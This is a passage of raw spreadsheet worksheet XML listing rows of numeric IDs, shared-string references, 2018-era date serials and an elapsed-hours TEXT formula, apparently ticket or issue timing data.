        <v>11592</v>
      </c>
      <c r="C1565" t="s">
        <v>4153</v>
      </c>
      <c r="D1565" t="s">
        <v>7</v>
      </c>
      <c r="E1565" s="1">
        <v>43301.16542824074</v>
      </c>
      <c r="F1565" s="1">
        <v>43301.743946759256</v>
      </c>
      <c r="G1565" t="s">
        <v>66</v>
      </c>
      <c r="H1565" t="str">
        <f>TEXT(F1565-E1565,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="1566" spans="1:8" hidden="1">
      <c r="A1566" t="s">
        <v>4154</v>
      </c>
      <c r="B1566">
        <v>11591</v>
      </c>
      <c r="C1566" t="s">
        <v>4155</v>
      </c>
      <c r="D1566" t="s">
        <v>7</v>
      </c>
      <c r="E1566" s="1">
        <v>43301.032476851855</v>
      </c>
      <c r="F1566" s="1">
        <v>43302.891423611109</v>
      </c>
      <c r="G1566" t="s">
        <v>174</v>
      </c>
      <c r="H1566" t="str">
        <f>TEXT(F1566-E1566,"[h]")</f>
        <v>44</v>
      </c>
    </row>
    <row r="1567" spans="1:8" hidden="1">
      <c r="A1567" t="s">
        <v>4156</v>
      </c>
      <c r="B1567">
        <v>11587</v>
      </c>
      <c r="C1567" t="s">
        <v>4157</v>
      </c>
      <c r="D1567" t="s">
        <v>7</v>
      </c>
      <c r="E1567" s="1">
        <v>43299.692233796297</v>
      </c>
      <c r="F1567" s="1">
        <v>43606.799108796295</v>
      </c>
      <c r="G1567" t="s">
        <v>222</v>
      </c>
      <c r="H1567" t="str">
        <f>TEXT(F1567-E1567,"[h]")</f>
        <v>7370</v>
      </c>
    </row>
    <row r="1568" spans="1:8">
      <c r="A1568" t="s">
        <v>4158</v>
      </c>
      <c r="B1568">
        <v>11586</v>
      </c>
      <c r="C1568" t="s">
        <v>4159</v>
      </c>
      <c r="D1568" t="s">
        <v>7</v>
      </c>
      <c r="E1568" s="1">
        <v>43299.466527777775</v>
      </c>
      <c r="F1568" s="1">
        <v>43334.750659722224</v>
      </c>
      <c r="G1568" t="s">
        <v>25</v>
      </c>
      <c r="H1568" t="str">
        <f>TEXT(F1568-E1568,"[h]")</f>
        <v>846</v>
      </c>
    </row>
    <row r="1569" spans="1:8" hidden="1">
      <c r="A1569" t="s">
        <v>4160</v>
      </c>
      <c r="B1569">
        <v>11585</v>
      </c>
      <c r="C1569" t="s">
        <v>4161</v>
      </c>
      <c r="D1569" t="s">
        <v>7</v>
      </c>
      <c r="E1569" s="1">
        <v>43299.359780092593</v>
      </c>
      <c r="F1569" s="1">
        <v>43304.629803240743</v>
      </c>
      <c r="G1569" t="s">
        <v>118</v>
      </c>
      <c r="H1569" t="str">
        <f>TEXT(F1569-E1569,"[h]")</f>
        <v>126</v>
      </c>
    </row>
    <row r="1570" spans="1:8" hidden="1">
      <c r="A1570" t="s">
        <v>4162</v>
      </c>
      <c r="B1570">
        <v>11584</v>
      </c>
      <c r="C1570" t="s">
        <v>4163</v>
      </c>
      <c r="D1570" t="s">
        <v>7</v>
      </c>
      <c r="E1570" s="1">
        <v>43298.933854166666</v>
      </c>
      <c r="F1570" s="1">
        <v>43299.689687500002</v>
      </c>
      <c r="G1570" t="s">
        <v>222</v>
      </c>
      <c r="H1570" t="str">
        <f>TEXT(F1570-E1570,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1571" spans="1:8" hidden="1">
      <c r="A1571" t="s">
        <v>4164</v>
      </c>
      <c r="B1571">
        <v>11583</v>
      </c>
      <c r="C1571" t="s">
        <v>4165</v>
      </c>
      <c r="D1571" t="s">
        <v>7</v>
      </c>
      <c r="E1571" s="1">
        <v>43298.913425925923</v>
      </c>
      <c r="F1571" s="1">
        <v>43746.631504629629</v>
      </c>
      <c r="G1571" t="s">
        <v>222</v>
      </c>
      <c r="H1571" t="str">
        <f>TEXT(F1571-E1571,"[h]")</f>
        <v>10745</v>
      </c>
    </row>
    <row r="1572" spans="1:8" hidden="1">
      <c r="A1572" t="s">
        <v>4166</v>
      </c>
      <c r="B1572">
        <v>11582</v>
      </c>
      <c r="C1572" t="s">
        <v>4167</v>
      </c>
      <c r="D1572" t="s">
        <v>7</v>
      </c>
      <c r="E1572" s="1">
        <v>43298.567499999997</v>
      </c>
      <c r="F1572" s="1">
        <v>43305.655057870368</v>
      </c>
      <c r="G1572" t="s">
        <v>304</v>
      </c>
      <c r="H1572" t="str">
        <f>TEXT(F1572-E1572,"[h]")</f>
        <v>170</v>
      </c>
    </row>
    <row r="1573" spans="1:8" hidden="1">
      <c r="A1573" t="s">
        <v>4168</v>
      </c>
      <c r="B1573">
        <v>11580</v>
      </c>
      <c r="C1573" t="s">
        <v>4169</v>
      </c>
      <c r="D1573" t="s">
        <v>7</v>
      </c>
      <c r="E1573" s="1">
        <v>43298.083148148151</v>
      </c>
      <c r="F1573" s="1">
        <v>43410.073391203703</v>
      </c>
      <c r="G1573" t="s">
        <v>28</v>
      </c>
      <c r="H1573" t="str">
        <f>TEXT(F1573-E1573,"[h]")</f>
        <v>2687</v>
      </c>
    </row>
    <row r="1574" spans="1:8" hidden="1">
      <c r="A1574" t="s">
        <v>4170</v>
      </c>
      <c r="B1574">
        <v>11578</v>
      </c>
      <c r="C1574" t="s">
        <v>4171</v>
      </c>
      <c r="D1574" t="s">
        <v>7</v>
      </c>
      <c r="E1574" s="1">
        <v>43297.866643518515</v>
      </c>
      <c r="F1574" s="1">
        <v>43297.906655092593</v>
      </c>
      <c r="G1574" t="s">
        <v>1539</v>
      </c>
      <c r="H1574" t="str">
        <f>TEXT(F1574-E1574,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1575" spans="1:8">
      <c r="A1575" t="s">
        <v>4172</v>
      </c>
      <c r="B1575">
        <v>11577</v>
      </c>
      <c r="C1575" t="s">
        <v>4173</v>
      </c>
      <c r="D1575" t="s">
        <v>7</v>
      </c>
      <c r="E1575" s="1">
        <v>43297.85659722222</v>
      </c>
      <c r="F1575" s="1">
        <v>43297.897280092591</v>
      </c>
      <c r="G1575" t="s">
        <v>4174</v>
      </c>
      <c r="H1575" t="str">
        <f>TEXT(F1575-E1575,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1576" spans="1:8" hidden="1">
      <c r="A1576" t="s">
        <v>4175</v>
      </c>
      <c r="B1576">
        <v>11573</v>
      </c>
      <c r="C1576" t="s">
        <v>4176</v>
      </c>
      <c r="D1576" t="s">
        <v>7</v>
      </c>
      <c r="E1576" s="1">
        <v>43295.959803240738</v>
      </c>
      <c r="F1576" s="1">
        <v>43333.638749999998</v>
      </c>
      <c r="G1576" t="s">
        <v>2631</v>
      </c>
      <c r="H1576" t="str">
        <f>TEXT(F1576-E1576,"[h]")</f>
        <v>904</v>
      </c>
    </row>
    <row r="1577" spans="1:8">
      <c r="A1577" t="s">
        <v>4177</v>
      </c>
      <c r="B1577">
        <v>11570</v>
      </c>
      <c r="C1577" t="s">
        <v>4178</v>
      </c>
      <c r="D1577" t="s">
        <v>7</v>
      </c>
      <c r="E1577" s="1">
        <v>43295.898946759262</v>
      </c>
      <c r="F1577" s="1">
        <v>43296.897581018522</v>
      </c>
      <c r="G1577" t="s">
        <v>16</v>
      </c>
      <c r="H1577" t="str">
        <f>TEXT(F1577-E1577,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="1578" spans="1:8">
      <c r="A1578" t="s">
        <v>4179</v>
      </c>
      <c r="B1578">
        <v>11568</v>
      </c>
      <c r="C1578" t="s">
        <v>4180</v>
      </c>
      <c r="D1578" t="s">
        <v>7</v>
      </c>
      <c r="E1578" s="1">
        <v>43295.689293981479</v>
      </c>
      <c r="F1578" s="1">
        <v>43297.057013888887</v>
      </c>
      <c r="G1578" t="s">
        <v>4181</v>
      </c>
      <c r="H1578" t="str">
        <f>TEXT(F1578-E1578,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="1579" spans="1:8" hidden="1">
      <c r="A1579" t="s">
        <v>4182</v>
      </c>
      <c r="B1579">
        <v>11567</v>
      </c>
      <c r="C1579" t="s">
        <v>4183</v>
      </c>
      <c r="D1579" t="s">
        <v>7</v>
      </c>
      <c r="E1579" s="1">
        <v>43295.684965277775</v>
      </c>
      <c r="F1579" s="1">
        <v>43301.742615740739</v>
      </c>
      <c r="G1579" t="s">
        <v>55</v>
      </c>
      <c r="H1579" t="str">
        <f>TEXT(F1579-E1579,"[h]")</f>
        <v>145</v>
      </c>
    </row>
    <row r="1580" spans="1:8" hidden="1">
      <c r="A1580" t="s">
        <v>4184</v>
      </c>
      <c r="B1580">
        <v>11566</v>
      </c>
      <c r="C1580" t="s">
        <v>4185</v>
      </c>
      <c r="D1580" t="s">
        <v>7</v>
      </c>
      <c r="E1580" s="1">
        <v>43295.660231481481</v>
      </c>
      <c r="F1580" s="1">
        <v>43304.533206018517</v>
      </c>
      <c r="G1580" t="s">
        <v>60</v>
      </c>
      <c r="H1580" t="str">
        <f>TEXT(F1580-E1580,"[h]")</f>
        <v>212</v>
      </c>
    </row>
    <row r="1581" spans="1:8" hidden="1">
      <c r="A1581" t="s">
        <v>4186</v>
      </c>
      <c r="B1581">
        <v>11565</v>
      </c>
      <c r="C1581" t="s">
        <v>4187</v>
      </c>
      <c r="D1581" t="s">
        <v>7</v>
      </c>
      <c r="E1581" s="1">
        <v>43295.648159722223</v>
      </c>
      <c r="F1581" s="1">
        <v>43295.775787037041</v>
      </c>
      <c r="G1581" t="s">
        <v>4188</v>
      </c>
      <c r="H1581" t="str">
        <f>TEXT(F1581-E1581,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1582" spans="1:8" hidden="1">
      <c r="A1582" t="s">
        <v>4189</v>
      </c>
      <c r="B1582">
        <v>11564</v>
      </c>
      <c r="C1582" t="s">
        <v>4190</v>
      </c>
      <c r="D1582" t="s">
        <v>7</v>
      </c>
      <c r="E1582" s="1">
        <v>43295.63071759259</v>
      </c>
      <c r="F1582" s="1">
        <v>43297.057013888887</v>
      </c>
      <c r="G1582" t="s">
        <v>3114</v>
      </c>
      <c r="H1582" t="str">
        <f>TEXT(F1582-E1582,"[h]")</f>
        <v>34</v>
      </c>
    </row>
    <row r="1583" spans="1:8" hidden="1">
      <c r="A1583" t="s">
        <v>446</v>
      </c>
      <c r="B1583">
        <v>11562</v>
      </c>
      <c r="C1583" t="s">
        <v>4191</v>
      </c>
      <c r="D1583" t="s">
        <v>7</v>
      </c>
      <c r="E1583" s="1">
        <v>43295.201481481483</v>
      </c>
      <c r="F1583" s="1">
        <v>43296.154942129629</v>
      </c>
      <c r="G1583" t="s">
        <v>66</v>
      </c>
      <c r="H1583" t="str">
        <f>TEXT(F1583-E1583,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="1584" spans="1:8" hidden="1">
      <c r="A1584" t="s">
        <v>4192</v>
      </c>
      <c r="B1584">
        <v>11561</v>
      </c>
      <c r="C1584" t="s">
        <v>4193</v>
      </c>
      <c r="D1584" t="s">
        <v>7</v>
      </c>
      <c r="E1584" s="1">
        <v>43295.15662037037</v>
      </c>
      <c r="F1584" s="1">
        <v>43298.057222222225</v>
      </c>
      <c r="G1584" t="s">
        <v>1305</v>
      </c>
      <c r="H1584" t="str">
        <f>TEXT(F1584-E1584,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="1585" spans="1:8" hidden="1">
      <c r="A1585" t="s">
        <v>4194</v>
      </c>
      <c r="B1585">
        <v>11560</v>
      </c>
      <c r="C1585" t="s">
        <v>4195</v>
      </c>
      <c r="D1585" t="s">
        <v>7</v>
      </c>
      <c r="E1585" s="1">
        <v>43295.143854166665</v>
      </c>
      <c r="F1585" s="1">
        <v>43295.179930555554</v>
      </c>
      <c r="G1585" t="s">
        <v>1305</v>
      </c>
      <c r="H1585" t="str">
        <f>TEXT(F1585-E1585,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1586" spans="1:8" hidden="1">
      <c r="A1586" t="s">
        <v>4196</v>
      </c>
      <c r="B1586">
        <v>11559</v>
      </c>
      <c r="C1586" t="s">
        <v>4197</v>
      </c>
      <c r="D1586" t="s">
        <v>7</v>
      </c>
      <c r="E1586" s="1">
        <v>43295.136481481481</v>
      </c>
      <c r="F1586" s="1">
        <v>43295.757013888891</v>
      </c>
      <c r="G1586" t="s">
        <v>1305</v>
      </c>
      <c r="H1586" t="str">
        <f>TEXT(F1586-E1586,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1587" spans="1:8" hidden="1">
      <c r="A1587" t="s">
        <v>4198</v>
      </c>
      <c r="B1587">
        <v>11553</v>
      </c>
      <c r="C1587" t="s">
        <v>4199</v>
      </c>
      <c r="D1587" t="s">
        <v>7</v>
      </c>
      <c r="E1587" s="1">
        <v>43292.634467592594</v>
      </c>
      <c r="F1587" s="1">
        <v>43292.800682870373</v>
      </c>
      <c r="G1587" t="s">
        <v>66</v>
      </c>
      <c r="H1587" t="str">
        <f>TEXT(F1587-E1587,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1588" spans="1:8" hidden="1">
      <c r="A1588" t="s">
        <v>4200</v>
      </c>
      <c r="B1588">
        <v>11544</v>
      </c>
      <c r="C1588" t="s">
        <v>4201</v>
      </c>
      <c r="D1588" t="s">
        <v>7</v>
      </c>
      <c r="E1588" s="1">
        <v>43291.43681712963</v>
      </c>
      <c r="F1588" s="1">
        <v>43320.306909722225</v>
      </c>
      <c r="G1588" t="s">
        <v>4202</v>
      </c>
      <c r="H1588" t="str">
        <f>TEXT(F1588-E1588,"[h]")</f>
        <v>692</v>
      </c>
    </row>
    <row r="1589" spans="1:8" hidden="1">
      <c r="A1589" t="s">
        <v>4203</v>
      </c>
      <c r="B1589">
        <v>11543</v>
      </c>
      <c r="C1589" t="s">
        <v>4204</v>
      </c>
      <c r="D1589" t="s">
        <v>7</v>
      </c>
      <c r="E1589" s="1">
        <v>43291.402719907404</v>
      </c>
      <c r="F1589" s="1">
        <v>43328.96775462963</v>
      </c>
      <c r="G1589" t="s">
        <v>66</v>
      </c>
      <c r="H1589" t="str">
        <f>TEXT(F1589-E1589,"[h]")</f>
        <v>901</v>
      </c>
    </row>
    <row r="1590" spans="1:8" hidden="1">
      <c r="A1590" t="s">
        <v>4205</v>
      </c>
      <c r="B1590">
        <v>11542</v>
      </c>
      <c r="C1590" t="s">
        <v>4206</v>
      </c>
      <c r="D1590" t="s">
        <v>7</v>
      </c>
      <c r="E1590" s="1">
        <v>43291.392268518517</v>
      </c>
      <c r="F1590" s="1">
        <v>43379.657731481479</v>
      </c>
      <c r="G1590" t="s">
        <v>118</v>
      </c>
      <c r="H1590" t="str">
        <f>TEXT(F1590-E1590,"[h]")</f>
        <v>2118</v>
      </c>
    </row>
    <row r="1591" spans="1:8" hidden="1">
      <c r="A1591" t="s">
        <v>4207</v>
      </c>
      <c r="B1591">
        <v>11540</v>
      </c>
      <c r="C1591" t="s">
        <v>4208</v>
      </c>
      <c r="D1591" t="s">
        <v>7</v>
      </c>
      <c r="E1591" s="1">
        <v>43290.639733796299</v>
      </c>
      <c r="F1591" s="1">
        <v>43290.687951388885</v>
      </c>
      <c r="G1591" t="s">
        <v>51</v>
      </c>
      <c r="H1591" t="str">
        <f>TEXT(F1591-E1591,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1592" spans="1:8">
      <c r="A1592" t="s">
        <v>4209</v>
      </c>
      <c r="B1592">
        <v>11538</v>
      </c>
      <c r="C1592" t="s">
        <v>4210</v>
      </c>
      <c r="D1592" t="s">
        <v>7</v>
      </c>
      <c r="E1592" s="1">
        <v>43290.559201388889</v>
      </c>
      <c r="F1592" s="1">
        <v>43290.726597222223</v>
      </c>
      <c r="G1592" t="s">
        <v>25</v>
      </c>
      <c r="H1592" t="str">
        <f>TEXT(F1592-E1592,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1593" spans="1:8" hidden="1">
      <c r="A1593" t="s">
        <v>4211</v>
      </c>
      <c r="B1593">
        <v>11537</v>
      </c>
      <c r="C1593" t="s">
        <v>4212</v>
      </c>
      <c r="D1593" t="s">
        <v>7</v>
      </c>
      <c r="E1593" s="1">
        <v>43290.429907407408</v>
      </c>
      <c r="F1593" s="1">
        <v>43320.899918981479</v>
      </c>
      <c r="G1593" t="s">
        <v>4213</v>
      </c>
      <c r="H1593" t="str">
        <f>TEXT(F1593-E1593,"[h]")</f>
        <v>731</v>
      </c>
    </row>
    <row r="1594" spans="1:8">
      <c r="A1594" t="s">
        <v>4214</v>
      </c>
      <c r="B1594">
        <v>11536</v>
      </c>
      <c r="C1594" t="s">
        <v>4215</v>
      </c>
      <c r="D1594" t="s">
        <v>7</v>
      </c>
      <c r="E1594" s="1">
        <v>43290.331250000003</v>
      </c>
      <c r="F1594" s="1">
        <v>43424.31391203704</v>
      </c>
      <c r="G1594" t="s">
        <v>4216</v>
      </c>
      <c r="H1594" t="str">
        <f>TEXT(F1594-E1594,"[h]")</f>
        <v>3215</v>
      </c>
    </row>
    <row r="1595" spans="1:8">
      <c r="A1595" t="s">
        <v>4217</v>
      </c>
      <c r="B1595">
        <v>11535</v>
      </c>
      <c r="C1595" t="s">
        <v>4218</v>
      </c>
      <c r="D1595" t="s">
        <v>7</v>
      </c>
      <c r="E1595" s="1">
        <v>43290.217164351852</v>
      </c>
      <c r="F1595" s="1">
        <v>43316.081678240742</v>
      </c>
      <c r="G1595" t="s">
        <v>1023</v>
      </c>
      <c r="H1595" t="str">
        <f>TEXT(F1595-E1595,"[h]")</f>
        <v>620</v>
      </c>
    </row>
    <row r="1596" spans="1:8" hidden="1">
      <c r="B1596">
        <v>11534</v>
      </c>
      <c r="C1596" t="s">
        <v>4219</v>
      </c>
      <c r="D1596" t="s">
        <v>7</v>
      </c>
      <c r="E1596" s="1">
        <v>43290.208518518521</v>
      </c>
      <c r="F1596" s="1">
        <v>43290.615439814814</v>
      </c>
      <c r="G1596" t="s">
        <v>66</v>
      </c>
      <c r="H1596" t="str">
        <f>TEXT(F1596-E1596,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1597" spans="1:8" hidden="1">
      <c r="B1597">
        <v>11533</v>
      </c>
      <c r="C1597" t="s">
        <v>4220</v>
      </c>
      <c r="D1597" t="s">
        <v>7</v>
      </c>
      <c r="E1597" s="1">
        <v>43289.870729166665</v>
      </c>
      <c r="F1597" s="1">
        <v>43289.927685185183</v>
      </c>
      <c r="G1597" t="s">
        <v>916</v>
      </c>
      <c r="H1597" t="str">
        <f>TEXT(F1597-E1597,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1598" spans="1:8">
      <c r="A1598" t="s">
        <v>4221</v>
      </c>
      <c r="B1598">
        <v>11532</v>
      </c>
      <c r="C1598" t="s">
        <v>4222</v>
      </c>
      <c r="D1598" t="s">
        <v>7</v>
      </c>
      <c r="E1598" s="1">
        <v>43289.848182870373</v>
      </c>
      <c r="F1598" s="1">
        <v>43289.908368055556</v>
      </c>
      <c r="G1598" t="s">
        <v>98</v>
      </c>
      <c r="H1598" t="str">
        <f>TEXT(F1598-E1598,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1599" spans="1:8" hidden="1">
      <c r="A1599" t="s">
        <v>4223</v>
      </c>
      <c r="B1599">
        <v>11531</v>
      </c>
      <c r="C1599" t="s">
        <v>4224</v>
      </c>
      <c r="D1599" t="s">
        <v>7</v>
      </c>
      <c r="E1599" s="1">
        <v>43289.834444444445</v>
      </c>
      <c r="F1599" s="1">
        <v>43289.907638888886</v>
      </c>
      <c r="G1599" t="s">
        <v>258</v>
      </c>
      <c r="H1599" t="str">
        <f>TEXT(F1599-E1599,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1600" spans="1:8" hidden="1">
      <c r="A1600" t="s">
        <v>4225</v>
      </c>
      <c r="B1600">
        <v>11530</v>
      </c>
      <c r="C1600" t="s">
        <v>4226</v>
      </c>
      <c r="D1600" t="s">
        <v>7</v>
      </c>
      <c r="E1600" s="1">
        <v>43289.789375</v>
      </c>
      <c r="F1600" s="1">
        <v>43435.770185185182</v>
      </c>
      <c r="G1600" t="s">
        <v>4227</v>
      </c>
      <c r="H1600" t="str">
        <f>TEXT(F1600-E1600,"[h]")</f>
        <v>3503</v>
      </c>
    </row>
    <row r="1601" spans="1:8" hidden="1">
      <c r="A1601" t="s">
        <v>4228</v>
      </c>
      <c r="B1601">
        <v>11529</v>
      </c>
      <c r="C1601" t="s">
        <v>4229</v>
      </c>
      <c r="D1601" t="s">
        <v>7</v>
      </c>
      <c r="E1601" s="1">
        <v>43289.725092592591</v>
      </c>
      <c r="F1601" s="1">
        <v>43289.824803240743</v>
      </c>
      <c r="G1601" t="s">
        <v>1867</v>
      </c>
      <c r="H1601" t="str">
        <f>TEXT(F1601-E1601,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1602" spans="1:8" hidden="1">
      <c r="A1602" t="s">
        <v>4230</v>
      </c>
      <c r="B1602">
        <v>11528</v>
      </c>
      <c r="C1602" t="s">
        <v>4231</v>
      </c>
      <c r="D1602" t="s">
        <v>7</v>
      </c>
      <c r="E1602" s="1">
        <v>43289.500474537039</v>
      </c>
      <c r="F1602" s="1">
        <v>43324.998506944445</v>
      </c>
      <c r="G1602" t="s">
        <v>4232</v>
      </c>
      <c r="H1602" t="str">
        <f>TEXT(F1602-E1602,"[h]")</f>
        <v>851</v>
      </c>
    </row>
    <row r="1603" spans="1:8" hidden="1">
      <c r="A1603" t="s">
        <v>4233</v>
      </c>
      <c r="B1603">
        <v>11527</v>
      </c>
      <c r="C1603" t="s">
        <v>4234</v>
      </c>
      <c r="D1603" t="s">
        <v>7</v>
      </c>
      <c r="E1603" s="1">
        <v>43289.193206018521</v>
      </c>
      <c r="F1603" s="1">
        <v>43289.817048611112</v>
      </c>
      <c r="G1603" t="s">
        <v>204</v>
      </c>
      <c r="H1603" t="str">
        <f>TEXT(F1603-E1603,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1604" spans="1:8" hidden="1">
      <c r="A1604" t="s">
        <v>4235</v>
      </c>
      <c r="B1604">
        <v>11526</v>
      </c>
      <c r="C1604" t="s">
        <v>4236</v>
      </c>
      <c r="D1604" t="s">
        <v>7</v>
      </c>
      <c r="E1604" s="1">
        <v>43288.835740740738</v>
      </c>
      <c r="F1604" s="1">
        <v>43428.047824074078</v>
      </c>
      <c r="G1604" t="s">
        <v>4237</v>
      </c>
      <c r="H1604" t="str">
        <f>TEXT(F1604-E1604,"[h]")</f>
        <v>3341</v>
      </c>
    </row>
    <row r="1605" spans="1:8" hidden="1">
      <c r="A1605" t="s">
        <v>4238</v>
      </c>
      <c r="B1605">
        <v>11525</v>
      </c>
      <c r="C1605" t="s">
        <v>4239</v>
      </c>
      <c r="D1605" t="s">
        <v>7</v>
      </c>
      <c r="E1605" s="1">
        <v>43288.681284722225</v>
      </c>
      <c r="F1605" s="1">
        <v>43295.174664351849</v>
      </c>
      <c r="G1605" t="s">
        <v>1302</v>
      </c>
      <c r="H1605" t="str">
        <f>TEXT(F1605-E1605,"[h]")</f>
        <v>155</v>
      </c>
    </row>
    <row r="1606" spans="1:8" hidden="1">
      <c r="A1606" t="s">
        <v>4240</v>
      </c>
      <c r="B1606">
        <v>11522</v>
      </c>
      <c r="C1606" t="s">
        <v>4241</v>
      </c>
      <c r="D1606" t="s">
        <v>7</v>
      </c>
      <c r="E1606" s="1">
        <v>43288.096585648149</v>
      </c>
      <c r="F1606" s="1">
        <v>43310.665717592594</v>
      </c>
      <c r="G1606" t="s">
        <v>43</v>
      </c>
      <c r="H1606" t="str">
        <f>TEXT(F1606-E1606,"[h]")</f>
        <v>541</v>
      </c>
    </row>
    <row r="1607" spans="1:8">
      <c r="A1607" t="s">
        <v>4242</v>
      </c>
      <c r="B1607">
        <v>11520</v>
      </c>
      <c r="C1607" t="s">
        <v>4243</v>
      </c>
      <c r="D1607" t="s">
        <v>7</v>
      </c>
      <c r="E1607" s="1">
        <v>43287.868750000001</v>
      </c>
      <c r="F1607" s="1">
        <v>43289.924004629633</v>
      </c>
      <c r="G1607" t="s">
        <v>2482</v>
      </c>
      <c r="H1607" t="str">
        <f>TEXT(F1607-E1607,"[h]")</f>
        <v>49</v>
      </c>
    </row>
    <row r="1608" spans="1:8" hidden="1">
      <c r="A1608" t="s">
        <v>4244</v>
      </c>
      <c r="B1608">
        <v>11518</v>
      </c>
      <c r="C1608" t="s">
        <v>4245</v>
      </c>
      <c r="D1608" t="s">
        <v>7</v>
      </c>
      <c r="E1608" s="1">
        <v>43287.697118055556</v>
      </c>
      <c r="F1608" s="1">
        <v>43290.175949074073</v>
      </c>
      <c r="G1608" t="s">
        <v>28</v>
      </c>
      <c r="H1608" t="str">
        <f>TEXT(F1608-E1608,"[h]")</f>
        <v>59</v>
      </c>
    </row>
    <row r="1609" spans="1:8">
      <c r="A1609" t="s">
        <v>4246</v>
      </c>
      <c r="B1609">
        <v>11515</v>
      </c>
      <c r="C1609" t="s">
        <v>4247</v>
      </c>
      <c r="D1609" t="s">
        <v>7</v>
      </c>
      <c r="E1609" s="1">
        <v>43287.208078703705</v>
      </c>
      <c r="F1609" s="1">
        <v>43289.83148148148</v>
      </c>
      <c r="G1609" t="s">
        <v>16</v>
      </c>
      <c r="H1609" t="str">
        <f>TEXT(F1609-E1609,"[h]")</f>
        <v>62</v>
      </c>
    </row>
    <row r="1610" spans="1:8">
      <c r="A1610" t="s">
        <v>4248</v>
      </c>
      <c r="B1610">
        <v>11514</v>
      </c>
      <c r="C1610" t="s">
        <v>4249</v>
      </c>
      <c r="D1610" t="s">
        <v>7</v>
      </c>
      <c r="E1610" s="1">
        <v>43287.157453703701</v>
      </c>
      <c r="F1610" s="1">
        <v>43288.114641203705</v>
      </c>
      <c r="G1610" t="s">
        <v>160</v>
      </c>
      <c r="H1610" t="str">
        <f>TEXT(F1610-E1610,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="1611" spans="1:8" hidden="1">
      <c r="A1611" t="s">
        <v>4250</v>
      </c>
      <c r="B1611">
        <v>11512</v>
      </c>
      <c r="C1611" t="s">
        <v>4251</v>
      </c>
      <c r="D1611" t="s">
        <v>7</v>
      </c>
      <c r="E1611" s="1">
        <v>43286.795949074076</v>
      </c>
      <c r="F1611" s="1">
        <v>43311.743252314816</v>
      </c>
      <c r="G1611" t="s">
        <v>4252</v>
      </c>
      <c r="H1611" t="str">
        <f>TEXT(F1611-E1611,"[h]")</f>
        <v>598</v>
      </c>
    </row>
    <row r="1612" spans="1:8" hidden="1">
      <c r="A1612" t="s">
        <v>4255</v>
      </c>
      <c r="B1612">
        <v>11509</v>
      </c>
      <c r="C1612" t="s">
        <v>4256</v>
      </c>
      <c r="D1612" t="s">
        <v>7</v>
      </c>
      <c r="E1612" s="1">
        <v>43286.674745370372</v>
      </c>
      <c r="F1612" s="1">
        <v>43481.377708333333</v>
      </c>
      <c r="G1612" t="s">
        <v>118</v>
      </c>
      <c r="H1612" t="str">
        <f>TEXT(F1612-E1612,"[h]")</f>
        <v>4672</v>
      </c>
    </row>
    <row r="1613" spans="1:8">
      <c r="A1613" t="s">
        <v>4257</v>
      </c>
      <c r="B1613">
        <v>11507</v>
      </c>
      <c r="C1613" t="s">
        <v>4258</v>
      </c>
      <c r="D1613" t="s">
        <v>7</v>
      </c>
      <c r="E1613" s="1">
        <v>43286.633009259262</v>
      </c>
      <c r="F1613" s="1">
        <v>43289.83148148148</v>
      </c>
      <c r="G1613" t="s">
        <v>25</v>
      </c>
      <c r="H1613" t="str">
        <f>TEXT(F1613-E1613,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="1614" spans="1:8" hidden="1">
      <c r="A1614" t="s">
        <v>4259</v>
      </c>
      <c r="B1614">
        <v>11504</v>
      </c>
      <c r="C1614" t="s">
        <v>4260</v>
      </c>
      <c r="D1614" t="s">
        <v>7</v>
      </c>
      <c r="E1614" s="1">
        <v>43286.411261574074</v>
      </c>
      <c r="F1614" s="1">
        <v>43313.711689814816</v>
      </c>
      <c r="G1614" t="s">
        <v>660</v>
      </c>
      <c r="H1614" t="str">
        <f>TEXT(F1614-E1614,"[h]")</f>
        <v>655</v>
      </c>
    </row>
    <row r="1615" spans="1:8" hidden="1">
      <c r="A1615" t="s">
        <v>4261</v>
      </c>
      <c r="B1615">
        <v>11501</v>
      </c>
      <c r="C1615" t="s">
        <v>4262</v>
      </c>
      <c r="D1615" t="s">
        <v>7</v>
      </c>
      <c r="E1615" s="1">
        <v>43285.903807870367</v>
      </c>
      <c r="F1615" s="1">
        <v>43286.676111111112</v>
      </c>
      <c r="G1615" t="s">
        <v>60</v>
      </c>
      <c r="H1615" t="str">
        <f>TEXT(F1615-E1615,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1616" spans="1:8" hidden="1">
      <c r="A1616" t="s">
        <v>4263</v>
      </c>
      <c r="B1616">
        <v>11499</v>
      </c>
      <c r="C1616" t="s">
        <v>4264</v>
      </c>
      <c r="D1616" t="s">
        <v>7</v>
      </c>
      <c r="E1616" s="1">
        <v>43285.582476851851</v>
      </c>
      <c r="F1616" s="1">
        <v>43388.287534722222</v>
      </c>
      <c r="G1616" t="s">
        <v>118</v>
      </c>
      <c r="H1616" t="str">
        <f>TEXT(F1616-E1616,"[h]")</f>
        <v>2464</v>
      </c>
    </row>
    <row r="1617" spans="1:8">
      <c r="A1617" t="s">
        <v>4276</v>
      </c>
      <c r="B1617">
        <v>11490</v>
      </c>
      <c r="C1617" t="s">
        <v>4277</v>
      </c>
      <c r="D1617" t="s">
        <v>7</v>
      </c>
      <c r="E1617" s="1">
        <v>43284.844618055555</v>
      </c>
      <c r="F1617" s="1">
